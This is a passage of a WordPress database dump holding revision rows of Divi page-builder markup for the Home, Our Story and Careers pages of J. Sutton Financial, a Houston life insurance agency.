global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:31:57','2023-04-02 19:31:57','',138,'http://cmdev-site1.com/?p=636',0,'revision','',0),(625,1,'2023-04-02 19:16:12','2023-04-02 19:16:12','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_direction=\"left\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_style=\"bounce\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_direction=\"left\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:16:12','2023-04-02 19:16:12','',138,'http://cmdev-site1.com/?p=625',0,'revision','',0),(631,1,'2023-04-02 19:20:02','2023-04-02 19:20:02','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Confrence-Room-2-Black-White-Muted-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"33px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\" custom_margin=\"12px|auto||auto||\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Our Story\" color=\"#FFFFFF\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#FFFFFF\" header_font_size=\"30px\" hover_enabled=\"0\" global_colors_info=\"{}\" background_layout=\"dark\" sticky_enabled=\"0\"][/dsm_text_divider][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\" global_colors_info=\"{}\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-02 19:20:02','2023-04-02 19:20:02','',26,'http://cmdev-site1.com/?p=631',0,'revision','',0),(626,1,'2023-04-02 19:16:51','2023-04-02 19:16:51','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Our Story\" color=\"#003372\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Confrence-Room-2-Black-White-Muted-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"33px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\" global_colors_info=\"{}\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"flip\" animation_direction=\"right\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-02 19:16:51','2023-04-02 19:16:51','',26,'http://cmdev-site1.com/?p=626',0,'revision','',0),(628,1,'2023-04-02 19:18:02','2023-04-02 19:18:02','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_text_divider header=\"Careers\" color=\"#003372\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" animation_direction=\"right\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" 